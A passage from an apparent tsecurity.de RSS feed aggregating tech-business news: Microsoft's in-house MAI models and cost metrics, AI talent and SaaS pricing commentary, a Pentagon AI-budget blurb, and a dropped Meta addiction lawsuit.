per million text input tokens, $8 per million image input tokens, and $106 per million image output tokens. The base <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5</a> model recently launched at <a href="https://microsoft.ai/news/introducing-mai-image-2-5/">No. 2 for image editing on Arena</a>, the community leaderboard that has become a de facto scoreboard for generative media.</p><p>The creative industry appears to be taking notice. Rob Reilly, global chief creative officer at advertising giant WPP, called the Pro model "a strong leap forward for GenMedia tools" in a statement included in Microsoft's announcement, adding that "Microsoft has firmly established itself among the leaders in generative AI."</p><p><a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Voice-2-Flash</a> goes the other direction. First previewed at Microsoft's <a href="https://news.microsoft.com/build-2026/">Build conference</a>, Flash runs twice as fast as MAI-Voice-2 and costs 32% less, priced at $15 per million characters. It is designed for the unglamorous but enormous market of high-volume voice — call centers, voice agents, and real-time speech applications where latency and cost-per-call matter more than marginal gains in expressiveness. Together, the two models reflect a strategy of building families of models rather than a single flagship, because, as the company put it, a creative studio chasing maximum fidelity has very different needs from a customer service operation handling millions of calls a day.</p><h2><b>Microsoft's production metrics show in-house models cutting GPU costs by up to 89%</b></h2><p>The model launches are arguably less newsworthy than the deployment metrics Microsoft attached to them — numbers that read like a systematic case for swapping out third-party frontier models across its product portfolio. </p><p><a href="https://explore.microsoft.com/en-us/bing/features/bing-image-creator?form=MA13FV">Bing Image Creator </a>now runs entirely on <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5</a>, end to end, marking the first time the consumer image tool is fully in-house. In PowerPoint, Microsoft says MAI-Image-2.5 reduces GPU costs by up to 84% compared with GPT-Image-2, OpenAI's image model. In OneDrive, where MAI-Image-2.5 is now the default for key image-editing scenarios, the company reports a 26% increase in save rates, roughly 25% lower P95 latency, and 2.5 times greater efficiency under medium-utilization production workloads.</p><p>On the voice side, <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Voice-2-Flash</a> now powers Dynamics 365 Contact Center — the platform used by customers including T-Mobile and EasyJet — where Microsoft claims GPU cost reductions of up to 89%. The model is also integrated into Azure Voice Live for developers building speech-to-speech agents.</p><p>Perhaps the most consequential deployment sits in healthcare. Microsoft's <a href="https://www.microsoft.com/en-us/health-solutions/clinical-workflow/dragon-copilot">Dragon Copilot</a>, used by 170,000 medical providers and responsible for processing 28 million patient encounters last quarter, now runs on MAI-Transcribe-1.5 for its multilingual workflow across 58 languages. Microsoft says internal evaluations show a 50% relative reduction in both transcription and language-identification error rates across most languages — a meaningful claim in a domain where transcription errors can propagate directly into clinical notes.</p><h2><b>Inside the 'hill-climbing' strategy that lets small models beat GPT-5.6 in Excel</b></h2><p>In a companion post published the same day, Microsoft detailed the methodology behind these results — what it calls its "<a href="https://microsoft.ai/news/hill-climbing-mai-models-for-github-copilot-and-excel/">hill-climbing machine</a>," an integrated flywheel of data, models, and the product "harness" that surrounds them.</p><p>The clearest example is <a href="https://microsoft.ai/news/introducingmai-code-1-flash/">MAI-Code-1-Flash</a>, the lightweight coding model launched in GitHub Copilot in June. Microsoft says the model achieves an approximately 10% higher code accept rate than GPT-5.4 Mini and Claude Haiku 4.5 in VS Code, while using 10% fewer median tokens. Developer retention tells a similar story: users were 6% more likely to return across multiple days than with GPT-5.4 Mini, and 11% more likely than with Claude Haiku 4.5.</p><p>Then Microsoft did something more interesting. It took the MAI-Code-1-Flash checkpoint and further <a href="https://microsoft.ai/news/hill-climbing-mai-models-for-github-copilot-and-excel/">trained it inside an Excel reinforcement learning environment</a>, teaching a coding model the tools and workflows of spreadsheet knowledge work. The result, according to production user feedback, is a model on par with GPT-5.6 for the most common Excel tasks — while being small enough to run on Nvidia's older H100 and even A100 GPUs rather than requiring the latest-generation accelerators.</p><p>That hardware detail deserves emphasis. Every major AI company is fighting for allocation of cutting-edge chips, and a model that delivers frontier-adjacent quality on two-generation-old silicon fundamentally changes the deployment economics. It also frees the newest hardware — including Microsoft's now-operational GB200 cluster — for training rather than serving.</p><h2><b>Satya Nadella's 'frontier diffusion' manifesto redraws the OpenAI relationship</b></h2><p>Microsoft CEO Satya Nadella framed the announcements in a lengthy post on X titled "<a href="https://x.com/satyanadella/status/2080329851127669104">Frontier Diffusion &amp; Control</a>," which functions as something close to a strategic manifesto. "We can now take saturated frontier capabilities and deliver them at scale and at lower cost through models optimized for high-usage products, while continuing to use frontier models for frontier needs," Nadella wrote, adding that Microsoft is "beginning to route traffic across our first-party surfaces to MAI whenever our models match or outperform frontier alternatives."</p><p>Translated from executive prose: capabilities that were state-of-the-art a year ago are now table stakes, and Microsoft believes it can replicate them cheaply for the specific, repetitive tasks that dominate real product usage. Why pay frontier prices for a frontier model when a user just wants to reformat a spreadsheet column?</p><p>Nadella was careful to note that "frontier models from OpenAI and Anthropic are part of the orchestration system alongside MAI" — but he also articulated a pointed principle of model independence, arguing that a company's evaluations "should continue to hill climb even when any given model has been removed." </p><p>“Keeping the harness, memory, context, and skills outside the model, he argued, is what gives Microsoft control. The subtext is hard to miss. Reuters reported in April that Microsoft’s <a href="https://www.reuters.com/legal/litigation/microsoft-end-exclusive-license-openais-technology-2026-04-27/">exclusive license to OpenAI’s technology</a> had been revised into a non-exclusive arrangement, and The Information reported last September that Microsoft had <a href="https://www.theinformation.com/articles/microsoft-buy-ai-anthropic-shift-openai">begun incorporating Anthropic models</a> into some products. Wednesday’s announcement completes the triangle: Microsoft as orchestrator, with its partners’ frontier models as interchangeable components and its own models absorbing an ever-larger share of routine traffic.”</p><h2><b>Developers cheer cheaper task-specific models while skeptics question Microsoft's track record</b></h2><p>The response online captured both the appeal and the skepticism surrounding the strategy. "I love when people use small models for niche tasks," wrote one X user, <a href="https://x.com/mavihsk/status/2080330529547993252">@mavihsk</a>, responding to Nadella's post. "Why do I have to use the all-knowing model just to change my field in Excel?" Another user, <a href="https://x.com/nabu_lines/status/2080343512780837226">@nabu_lines</a>, distilled the pitch neatly: "cost and performance both improve when you stop overusing the biggest model."</p><p>Others were less charitable about Microsoft's execution track record. "Microsoft is the worst when it comes to listening to user feedback," wrote designer <a href="https://x.com/designedbyabin/status/2080332368301412434">@designedbyabin</a>, arguing the company "will lose the AI race because they repeatedly failed to understand user needs." And one user, <a href="https://x.com/tokenoverflow/status/2080386145712824694">@tokenoverflow</a>, offered a drier critique of the model-independence pitch: "i want it keep hill climbing after removing microsoft."</p><p>The skeptics raise a fair point. Microsoft's self-reported metrics — accept rates, save rates, GPU savings — come from its own internal evaluations, not independent benchmarks, and the company chooses which comparisons to publish.</p><p>But the strategy's logic does not depend on any single number. Nadella's framing that software now has "<a href="https://x.com/satyanadella/status/2080329851127669104">real marginal cost for the first time</a>" explains why Microsoft is obsessive about tokens, GPUs, and serving costs: when AI features run on every keystroke across a billion-user product portfolio, an 84% GPU cost reduction is not an optimization. It is the difference between a viable business and a money pit.</p><h2><b>Why Microsoft is turning its internal AI playbook into an Azure product</b></h2><p>The final piece of the strategy is that Microsoft is selling the playbook, not just the models. Nadella explicitly positioned the hill-climbing approach as "a template for every other AI native, SaaS, or Enterprise company," and Microsoft is packaging the toolchain through Foundry and what it calls Frontier Tuning — letting enterprises train specialized models against their own proprietary evaluations and reinforcement learning environments. That turns Microsoft's internal cost-cutting exercise into an Azure product, and it gives enterprise customers a reason to run their AI workloads on Microsoft's cloud even if the models themselves come from elsewhere.</p><p>The company's emphasis on models trained "on clean, traceable, enterprise-grade data, without distillation from third-party models" serves the same commercial end. In an industry facing mounting scrutiny over training data provenance, Microsoft is betting that enterprise buyers — and courts — will care where model capabilities come from. Microsoft says it is now extending the hill-climbing approach to <a href="https://copilot.microsoft.com/">Copilot Chat</a>, <a href="https://outlook.live.com/mail/">Outlook</a>, and <a href="https://www.microsoft.com/en-us/microsoft-365/powerpoint">PowerPoint</a>, and both new models are available in public preview through <a href="https://azure.microsoft.com/en-us/products/ai-foundry">Microsoft Foundry</a> and the <a href="https://playground.microsoft.ai/">MAI Playground</a>. "None of this is an endpoint," the company wrote. "We're just getting started."</p><p>Seven years ago, <a href="https://www.cnbc.com/2024/08/10/rise-of-openai-microsofts-13-billion-artificial-intelligence-bet.html">Microsoft bet more than $13 billion</a> that OpenAI would build the future of AI. Wednesday's announcement suggests the company has since learned a cheaper lesson: the future of AI may belong to whoever builds the frontier, but the profits belong to whoever makes it ordinary.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pentagon kloppt Jahres-Budget für KI in wenigen Tagen auf den Kopf]]></title>
<description><![CDATA[Die US-Armee hat ihr Jahresbudget für Künstliche Intelligenz in nur einem Monat aufgebraucht. Das Militär hatte das Personal zuvor massiv gedrängt, Sprachmodelle für Büroaufgaben zu nutzen. Nun muss die Führung strikte Obergrenzen verhängen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3690121/it-security-nachrichten/pentagon-kloppt-jahres-budget-fuer-ki-in-wenigen-tagen-auf-den-kopf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690121/it-security-nachrichten/pentagon-kloppt-jahres-budget-fuer-ki-in-wenigen-tagen-auf-den-kopf/</guid>
<pubDate>Thu, 23 Jul 2026 21:59:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160171.html"><img hspace="5" border="0" align="left" alt="Ki, Künstliche Intelligenz, Technologie, Roboter, Geld, Sci-Fi, Automatisierung, Dollar, Fintech, Futurismus, Digitale Währung, Finanztechnologie, Dollarscheine, KI-Finanzen, Roboter-Geld, Zukunft der Finanzen, Roboterökonomie" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/76541.jpg"></a>
			Die US-Armee hat ihr Jahresbudget für Künstliche Intelligenz in nur einem Monat aufgebraucht. Das Militär hatte das Personal zuvor massiv gedrängt, Sprachmodelle für Büroaufgaben zu nutzen. Nun muss die Führung strikte Obergrenzen verhängen.			(<a href="https://winfuture.de/news,160171.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[How to navigate the AI talent wars]]></title>
<description><![CDATA[Cloudflare recently beat Q1 2026 earnings. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”



...]]></description>
<link>https://tsecurity.de/de/3689121/it-nachrichten/how-to-navigate-the-ai-talent-wars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689121/it-nachrichten/how-to-navigate-the-ai-talent-wars/</guid>
<pubDate>Thu, 23 Jul 2026 15:06:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-net-q1-earnings-revenues-230528107.html">Cloudflare recently beat Q1 2026 earnings</a>. Revenue up 34% year over year. EPS ahead of consensus. Full-year guidance raised. Then, in the same breath, they announced 1,100 layoffs, 20% of the company. CEO Matthew Prince’s explanation: “The way we work at Cloudflare has fundamentally changed.”</p>



<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/block-q1-earnings-beat-strong-144200216.html">Block did the same thing</a>. Beat guidance, raised outlook, cut 4,000+ jobs. Both framed it as architecting for the AI era.</p>



<p class="wp-block-paragraph">This is not a contradiction. This is the new math boards are running. And if you’re a CIO who hasn’t started running it yourself, <a href="mailto:https://www.cio.com/article/4077996/cios-be-ready-for-agentic-ai-or-be-out-of-a-job.html">you’re behind</a>.</p>



<h2 class="wp-block-heading">The benchmark has moved</h2>



<p class="wp-block-paragraph">AI-native companies have quietly reset what “efficient” means for a technology organization. Midjourney generates over $500M in revenue with roughly 160 employees, over $3M per head. Anthropic hit a $14B annualized run rate in early 2026 with fewer than 3,000 employees. Across the top AI-native startups, <a href="mailto:https://www.forbes.com/sites/paulbaier/2026/03/31/ai-native-firms-lead-in-revenue-per-employee/">the average revenue per employee is $3.48M</a>, nearly twelve times the traditional SaaS benchmark of $300K.</p>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/what-to-do-if-your-business-decelerates/">Boards aren’t comparing you to your 2019 self anymore</a>. They’re comparing you to Anthropic.</p>



<p class="wp-block-paragraph">This is the pressure Cloudflare and Block are responding to. They’re not cutting people because the business is struggling. They’re cutting because investors have internalized a new denominator. Headcount is no longer a proxy for capacity; it’s a liability on the efficiency ratio.</p>



<p class="wp-block-paragraph">For CIOs, this creates a hiring problem that looks nothing like the cloud or mobile talent gaps of the past decade. Those gaps were about volume: hire 100 cloud engineers, absorb the cost, build the capability… This one is about density; you’re not looking for 100 people. You’re looking for 10 who can deliver what 100 couldn’t, and justify $1M or more in value per seat.</p>



<p class="wp-block-paragraph">Finding bodies to fill seats has never been easier. Finding people who operate at that level of leverage is a different problem entirely.</p>



<h2 class="wp-block-heading">‘Acqui-hires’ are a shortcut with a hidden cost</h2>



<p class="wp-block-paragraph">Companies have figured out that recruiting AI-native talent one by one is too slow and that it’s faster to buy a team. Google’s acquisition of the Windsurf founders, Meta bringing in the Scale AI team, Accenture’s string of AI-focused acquisitions: <a href="mailto:https://tomtunguz.com/ai-acqui-hire-wave/">these are acqui-hires</a> dressed up as M&amp;A. The premium on experienced AI talent is high enough, and the urgency real enough, that organizations are skipping traditional hiring loops entirely and buying their way in.</p>



<p class="wp-block-paragraph">I’ve been on the other side of this. My company, MadKudu, was acquired by HG Insights specifically to bring AI-native capability into an established enterprise business. HG needed change agents who had already figured out how to build and ship in this new era, not just people who’d read about it. That’s the thesis behind most of these deals.</p>



<p class="wp-block-paragraph">But there’s a cost that doesn’t show up in the acquisition price.</p>



<p class="wp-block-paragraph">AI-native teams are fast because they operate with a different set of defaults: full access to tools, minimal governance layers, the ability to experiment and ship without a six-week approval cycle. That operating model is not a perk; it’s the fundamental mechanism. It’s why a team of 10 can do what an enterprise team of 100 can’t.</p>



<p class="wp-block-paragraph">When you acqui-hire that team and then slot them into your existing approval processes, you’ve bought the people and killed the engine. The change agents you paid for become change-frustrated. The attrition that follows is expensive and predictable.</p>



<p class="wp-block-paragraph">The harder realization: acquiring an AI-native team means accepting how they work. That requires deliberately carving out space for them to operate differently, not just tolerating it but institutionalizing it. The acquisition is an organizational change program, not just a hiring event.</p>



<h2 class="wp-block-heading">The CIO’s real problem</h2>



<p class="wp-block-paragraph">The governance stack most enterprise organizations run was designed for a headcount world. Every tool vetting cycle, every vendor review, every security approval was calibrated assuming you were managing a large team where consistency and control were the primary objectives.</p>



<p class="wp-block-paragraph">That calculus breaks when your goal is talent density. The same approval processes that protect against data leaks are now the reason your best people can’t do their best work. When it takes six weeks to approve a tool that your competitor’s team is already shipping with, you’ve traded velocity for the perception of safety.</p>



<p class="wp-block-paragraph">The practical fix is structured experimentation: clear guardrails, defined boundaries, but explicit permission to try tools before deciding whether to roll them out broadly. Gating everything prevents you from ever discovering what 10x productivity looks like.</p>



<p class="wp-block-paragraph">The skills inventory question is also more nuanced than it sounds. Job titles won’t tell you where the leverage is. You need to map the actual tasks within each function and assess which can be automated or augmented with AI. That’s where you find the people who, with the right tools, become your $1M/employee talent, not because you hired differently, but because you enabled better.</p>



<p class="wp-block-paragraph">This is also where the build-versus-buy question gets genuinely tricky. As AI reshapes how products are built and delivered, your internal operating model — how you work, how fast you ship, how you use data — is becoming core IP. Outsourcing delivery means outsourcing the part of the organization where your competitive advantage is now being built.</p>



<h2 class="wp-block-heading">Closing the gap without slowing down</h2>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/the-great-ai-talent-grab-the-latest-20vc-with-jason-harry-and-rory/">The AI talent wars</a> are not primarily a recruiting problem. They’re a rethinking of what organizations are supposed to look like.</p>



<p class="wp-block-paragraph">Boards have a new benchmark. Cloudflare, Block, Amazon, Meta and others have already started restructuring to meet it, publicly, painfully, even while beating their numbers. The question for CIOs isn’t whether this pressure arrives; it’s whether you’re ahead of it or behind it when it does.</p>



<p class="wp-block-paragraph">The organizations that navigate this well won’t win by outbidding competitors for a handful of elite engineers. They’ll win by designing operating systems that amplify the leverage of the talent they do have, by enabling their best people rather than constraining them, and by treating AI fluency as a core organizational capability rather than a niche specialization.</p>



<p class="wp-block-paragraph">Talent density is the new headcount model. The sooner your governance, your tooling and your board conversations reflect that, the better positioned you’ll be when the next efficiency report lands.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI helps scientists design the next generation of medicines]]></title>
<description><![CDATA[Designing and developing a new medicine is an expensive, failure-prone scientific challenge. A new drug can take many years to develop, at the cost of a significant investment. And even then, most possible candidates never reach the patient. For biologic medicines, therapies made from engineered ...]]></description>
<link>https://tsecurity.de/de/3688977/ai-nachrichten/how-ai-helps-scientists-design-the-next-generation-of-medicines/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688977/ai-nachrichten/how-ai-helps-scientists-design-the-next-generation-of-medicines/</guid>
<pubDate>Thu, 23 Jul 2026 14:06:23 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Designing and developing a new medicine is an expensive, failure-prone scientific challenge. A new drug can take many years to develop, at the cost of a significant investment. And even then, most possible candidates never reach the patient. For biologic medicines, therapies made from engineered proteins rather than synthetic chemistry (which are often used to…]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688966/it-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Thu, 23 Jul 2026 14:05:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[US teen drops Meta lawsuit on social media addiction days before trial]]></title>
<description><![CDATA[Withdrawn case marks a victory for the social media giant after earlier landmark loss at trial over addictive claimsA Florida teen whose lawsuit claimed Meta’s platforms were to blame ⁠for his depression ⁠and anxiety ​dropped his case against the company just days before the trial in Los Angeles ...]]></description>
<link>https://tsecurity.de/de/3688397/it-nachrichten/us-teen-drops-meta-lawsuit-on-social-media-addiction-days-before-trial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688397/it-nachrichten/us-teen-drops-meta-lawsuit-on-social-media-addiction-days-before-trial/</guid>
<pubDate>Thu, 23 Jul 2026 10:36:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Withdrawn case marks a victory for the social media giant after earlier landmark loss at trial over addictive claims</p><p>A <a href="https://www.theguardian.com/us-news/florida">Florida</a> teen whose lawsuit claimed <a href="https://www.theguardian.com/technology/meta">Meta</a>’s platforms were to blame ⁠for his depression ⁠and anxiety ​dropped his case against the company just days before the trial in <a href="https://www.theguardian.com/us-news/los-angeles">Los Angeles</a> was ⁠set to start, his attorneys said on Wednesday. It was the latest in a massive series of high-stakes lawsuits against social media companies for allegedly designing addictive products that lead to the harm of children.</p><p>The lawsuit, brought by a 15-year-old boy known as ⁠RKC, originally named four defendants, Google’s YouTube, Meta’s Instagram, Snap Inc’s ​Snapchat and ByteDance’s <a href="https://www.theguardian.com/us-news/2026/jun/15/florida-sues-tiktok-teen-social-media-access-law">TikTok</a><strong>. </strong>YouTube and TikTok ‌settled in June<strong> </strong>and<strong> </strong>Snap reached a tentative settlement in the case, Bloomberg ‌<a href="https://www.bloomberg.com/news/articles/2026-07-20/snap-nears-settlement-of-addiction-case-ahead-of-jury-trial">reported</a> on Monday. The terms of those settlements were confidential.</p> <a href="https://www.theguardian.com/technology/2026/jul/22/florida-teen-drops-meta-lawsuit">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP S/4HANA-Transformation zwischen Aufbruch und Realität]]></title>
<description><![CDATA[Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie.hasan as’ari – shutterstock.com



SAP-Anwenderunternehmen stehen unter Druck, auf SAP S/4HANA zu wechseln, weil die Mainstream-Wartung für SAP ERP (SAP ECC 6.0) Ende 2027 ausläuft...]]></description>
